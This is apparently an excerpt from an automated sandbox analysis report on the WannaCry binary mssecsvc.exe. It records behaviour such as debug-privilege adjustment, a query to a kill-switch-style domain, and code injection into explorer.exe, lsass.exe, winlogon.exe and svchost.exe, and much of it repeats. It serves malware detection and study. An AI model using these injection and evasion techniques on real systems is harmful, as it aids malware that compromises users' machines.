Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA05F2 mov eax, dword ptr fs:[00000030h]	17_2_00AA05F2
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA042D mov eax, dword ptr fs:[00000030h]	17_2_00AA042D
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA025E mov edx, dword ptr fs:[00000030h]	17_2_00AA025E
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE405F2 mov eax, dword ptr fs:[00000030h]	17_2_7FE405F2
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE4025E mov edx, dword ptr fs:[00000030h]	17_2_7FE4025E
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE4042D mov eax, dword ptr fs:[00000030h]	17_2_7FE4042D

Source: C:\Windows\mssecsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\mssecsvc.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462FE0 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462DC0 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463620 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462F60 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463710 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462C00 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462FE0 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462DC0 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463620 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462F60 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77463710 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 77462C00 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Windows\mssecsvc.exe	Thread created: unknown EIP: 7F5D3C38			Jump to behavior
Source: C:\Windows\mssecsvc.exe	Thread created: unknown EIP: 7F5E3C38			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462FE0 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462DC0 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77463620 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462F60 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77463710 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462C00 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462FE0 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462DC0 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77463620 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462F60 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77463710 value: E8	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Memory written: PID: 4084 base: 77462C00 value: E8	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\lsass.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\dwm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tghtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\lsass.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\dwm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: \BaseNamedObjects\tputVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
